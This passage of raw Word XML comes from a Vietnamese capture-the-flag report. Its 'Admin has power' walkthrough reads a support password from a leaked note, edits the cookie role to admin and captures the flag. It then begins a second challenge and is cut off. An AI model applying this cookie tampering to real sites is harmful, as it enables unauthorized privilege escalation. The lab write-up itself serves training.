              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02F40F2B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67F6A0B6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="5FFA1AEF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="52"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="060515F0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C273BC8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582D25D8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5711C687" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="71C47D32" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="52"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18E82043" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C2A7139" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23466B1B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F87A4A7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="7D163AE8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="52"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A03E1E6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21FDFC6A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27C92967" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B46256A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58DEC998" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8BB09" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Phần bên dưới của báo cáo này là tài liệu báo cáo chi tiết của nhóm thực hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C3AE8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="794CD32F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="134EAA7D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="360"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>BÁO CÁO CHI TIẾT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEF2CFD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kịch bản Admin has </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>power</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="319DCCDD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Admin has power - information, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0DC903CB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Tóm tắt: Thực hiện đăng nhập và leo quyền bằng account trong ghi chú và chỉnh sửa cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A33D7D"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587ACDD5" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta sẽ nhận được 1 trang login như hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A375418"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0CBD8E23" wp14:editId="5F028EA2">
            <wp:extent cx="6114105" cy="6527800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="6527800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A21641" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603C8710" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sẽ thử login bất kỳ tài khoản gì và bắt gói </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D166DA5"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0026C65B" wp14:editId="6A943AF1">
            <wp:extent cx="6114105" cy="4660900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22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
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="4660900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30791DF2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317E9FF0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trong cookie ta thấy được là role là support nên có thể là ta sẽ thực hiện thay đổi role này thành admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA778D"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53A61DFF" wp14:editId="26D99DD3">
            <wp:extent cx="6029325" cy="1019175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22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
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6029325" cy="1019175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F59535C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thực hiện đổi thành admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DFC2EC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73458AAF"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0588677F" wp14:editId="5CF71D52">
            <wp:extent cx="6105525" cy="5076825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6105525" cy="5076825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE64932" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngoài ra ta có thêm một thông tin ở phần note trong gói tin nhận về ta nhận được thông tin username và password của </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>support</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1692D31E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>user:support</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> password:x34245323</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B9D21C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BE3618"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0F2CB6BF" wp14:editId="416B7CB4">
            <wp:extent cx="6114105" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DF9DC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cuối cùng ta sẽ thực hiện đăng nhập bằng tài khoản support nhưng với role của admin trên cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D716CE" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="539BCB86" wp14:editId="1ADBAE1F">
            <wp:extent cx="6114105" cy="6591300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16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6114105" cy="6591300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>hiadminyouhavethepower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4092CB48" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: Thực hiện lọc đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8D591A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA03360" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_heading=h.bctuzuwok4qd" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản This is Sparta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDFF085" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">This is Sparta - data, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="691B07E3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
